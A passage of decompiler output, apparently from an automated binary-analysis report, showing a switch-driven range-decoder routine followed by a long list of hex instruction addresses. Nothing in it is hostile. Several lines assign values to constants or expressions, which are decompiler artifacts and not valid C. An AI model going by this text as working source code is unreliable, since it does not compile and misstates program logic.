							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                0x00000000
                                                                0x00406520
                                                                0x00406520
                                                                0x00406524
                                                                0x004065db
                                                                0x004065de
                                                                0x004065ea
                                                                0x004064cb
                                                                0x004064cb
                                                                0x004064ce
                                                                0x00406840
                                                                0x00406840
                                                                0x00406843
                                                                0x00406843
                                                                0x00406849
                                                                0x0040684f
                                                                0x00406855
                                                                0x0040686f
                                                                0x00406872
                                                                0x00406878
                                                                0x00406883
                                                                0x00406885
                                                                0x00406857
                                                                0x00406857
                                                                0x00406866
                                                                0x0040686a
                                                                0x0040686a
                                                                0x0040688f
                                                                0x004068b6
                                                                0x004068b6
                                                                0x004068bc
                                                                0x004068bc
                                                                0x00000000
                                                                0x00406891
                                                                0x00406891
                                                                0x00406895
                                                                0x00406a44
                                                                0x00000000
                                                                0x00406a44
                                                                0x004068a1
                                                                0x004068a8
                                                                0x004068b0
                                                                0x004068b3
                                                                0x00000000
                                                                0x004068b3
                                                                0x0040652a
                                                                0x0040652e
                                                                0x00406a6f
                                                                0x00406a6f
                                                                0x00406a72
                                                                0x00406a76
                                                                0x00406a76
                                                                0x00406534
                                                                0x0040653a
                                                                0x0040653d
                                                                0x00406541
                                                                0x00406544
                                                                0x00406548
                                                                0x00406a0e
                                                                0x00406a5a
                                                                0x00406a62
                                                                0x00406a69
                                                                0x00406a6b
                                                                0x00000000
                                                                0x00406a6b
                                                                0x0040654e
                                                                0x00406551
                                                                0x00406557
                                                                0x00406559
                                                                0x00406559
                                                                0x0040655c
                                                                0x0040655f
                                                                0x00406562
                                                                0x00406565
                                                                0x00406568
                                                                0x0040656b
                                                                0x0040656c
                                                                0x0040656e
                                                                0x0040656e
                                                                0x0040656e
                                                                0x00406571
                                                                0x00406574
                                                                0x00406577
                                                                0x0040657a
                                                                0x0040657a
                                                                0x0040657d
                                                                0x0040657f
                                                                0x0040657f
                                                                0x00406582
                                                                0x00406582
                                                                0x00406582
                                                                0x00406058
                                                                0x00406058
                                                                0x00406061
                                                                0x00000000
                                                                0x00000000
                                                                0x00406067
                                                                0x00000000
                                                                0x00406072
                                                                0x00000000
                                                                0x00000000
                                                                0x0040607b
                                                                0x0040607e
                                                                0x00406081
                                                                0x00406085
                                                                0x00000000
                                                                0x00000000
                                                                0x0040608b
                                                                0x0040608e
                                                                0x00406090
                                                                0x00406091
                                                                0x00406094
                                                                0x00406096
                                                                0x00406097
                                                                0x00406099
                                                                0x0040609c
                                                                0x004060a1
                                                                0x004060a6
                                                                0x004060af
                                                                0x004060c2
                                                                0x004060c5
                                                                0x004060d1
                                                                0x004060f9
                                                                0x004060fb
                                                                0x00406109
                                                                0x00406109
                                                                0x0040610d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060fd
                                                                0x00406100
                                                                0x00406101
                                                                0x00406101
                                                                0x00000000
                                                                0x004060fd
                                                                0x004060d7
                                                                0x004060dc
                                                                0x004060dc
                                                                0x004060e5
                                                                0x004060ed
                                                                0x004060f0
                                                                0x00000000
                                                                0x004060f6
                                                                0x004060f6
                                                                0x00000000
                                                                0x004060f6
                                                                0x00000000
                                                                0x00406113
                                                                0x00406113
                                                                0x00406117
                                                                0x004069c3
                                                                0x00000000
                                                                0x004069c3
                                                                0x00406120
                                                                0x00406130
                                                                0x00406133
                                                                0x00406136
                                                                0x00406136
                                                                0x00406136
                                                                0x00406139
                                                                0x0040613d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040613f
                                                                0x00406145
                                                                0x0040616f
                                                                0x00406175
                                                                0x0040617c
                                                                0x00000000
                                                                0x0040617c
                                                                0x0040614b
                                                                0x0040614e
                                                                0x00406153
                                                                0x00406153
                                                                0x0040615e
                                                                0x00406166
                                                                0x00406169
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061ae
                                                                0x004061b4
                                                                0x004061b7
                                                                0x004061c4
                                                                0x004061cc
                                                                0x00000000
                                                                0x00000000
                                                                0x00406183
                                                                0x00406183
                                                                0x00406187
                                                                0x004069d2
                                                                0x00000000
                                                                0x004069d2
                                                                0x00406193
                                                                0x0040619e
                                                                0x0040619e
                                                                0x0040619e
                                                                0x004061a1
                                                                0x004061a4
                                                                0x004061a7
                                                                0x004061ac
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x004061d4
                                                                0x004061d6
                                                                0x004061d9
                                                                0x0040624a
                                                                0x0040624d
                                                                0x00406250
                                                                0x00406257
                                                                0x00406261
                                                                0x00000000
                                                                0x00406261
                                                                0x004061db
                                                                0x004061df
                                                                0x004061e2
                                                                0x004061e4
                                                                0x004061e7
                                                                0x004061ea
                                                                0x004061ec
                                                                0x004061ef
                                                                0x004061f1
                                                                0x004061f6
                                                                0x004061f9
                                                                0x004061fc
                                                                0x00406200
                                                                0x00406207
                                                                0x0040620a
                                                                0x00406211
                                                                0x00406215
                                                                0x0040621d
                                                                0x0040621d
                                                                0x0040621d
                                                                0x00406217
                                                                0x00406217
                                                                0x00406217
                                                                0x0040620c
                                                                0x0040620c
                                                                0x0040620c
                                                                0x00406221
                                                                0x00406224
                                                                0x00406242
                                                                0x00406244
                                                                0x00000000
                                                                0x00406226
                                                                0x00406226
                                                                0x00406229
                                                                0x0040622c
                                                                0x0040622f
                                                                0x00406231
                                                                0x00406231
                                                                0x00406231
                                                                0x00406234
                                                                0x00406237
                                                                0x00406239
                                                                0x0040623a
                                                                0x0040623d
                                                                0x00000000
                                                                0x0040623d
                                                                0x00000000
                                                                0x00406473
                                                                0x00406477
                                                                0x00406495
                                                                0x00406498
                                                                0x0040649f
                                                                0x004064a2
                                                                0x004064a5
                                                                0x004064a8
                                                                0x004064ab
                                                                0x004064ae
                                                                0x004064b0
                                                                0x004064b7
                                                                0x004064b8
                                                                0x004064ba
                                                                0x004064bd
                                                                0x004064c0
                                                                0x004064c3
                                                                0x004064c3
                                                                0x004064c8
                                                                0x00000000
                                                                0x004064c8
                                                                0x00406479
                                                                0x0040647c
                                                                0x0040647f
                                                                0x00406489
                                                                0x00000000
                                                                0x00000000
                                                                0x004064dd
                                                                0x004064e1
                                                                0x00406504
                                                                0x00406507
                                                                0x0040650a
                                                                0x00406514
                                                                0x004064e3
                                                                0x004064e3
                                                                0x004064e6
                                                                0x004064e9
                                                                0x004064ec
                                                                0x004064f9
                                                                0x004064fc
                                                                0x004064fc
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00406591
                                                                0x00406595
                                                                0x0040659c
                                                                0x0040659f
                                                                0x004065a2
                                                                0x004065ac
                                                                0x00000000
                                                                0x004065ac
                                                                0x00406597
                                                                0x00000000
                                                                0x00000000
                                                                0x004065b8
                                                                0x004065bc
                                                                0x004065c3
                                                                0x004065c6
                                                                0x004065c9
                                                                0x004065be
                                                                0x004065be
                                                                0x004065be
                                                                0x004065cc
                                                                0x004065cf
                                                                0x004065d2
                                                                0x004065d2
                                                                0x004065d5
                                                                0x004065d8
                                                                0x00000000
                                                                0x00000000
                                                                0x00406678
                                                                0x00406678
                                                                0x0040667c
                                                                0x00406a1a
                                                                0x00000000
                                                                0x00406a1a
                                                                0x00406682
                                                                0x00406685
                                                                0x00406688
                                                                0x0040668c
                                                                0x0040668f
                                                                0x00406695
                                                                0x00406697
                                                                0x00406697
                                                                0x00406697
                                                                0x0040669a
                                                                0x0040669d
                                                                0x00000000
                                                                0x00000000
                                                                0x0040626d
                                                                0x0040626d
                                                                0x00406271
                                                                0x004069de
                                                                0x00000000
                                                                0x004069de
                                                                0x00406277
                                                                0x0040627a
                                                                0x0040627d
                                                                0x00406281
                                                                0x00406284
                                                                0x0040628a
                                                                0x0040628c
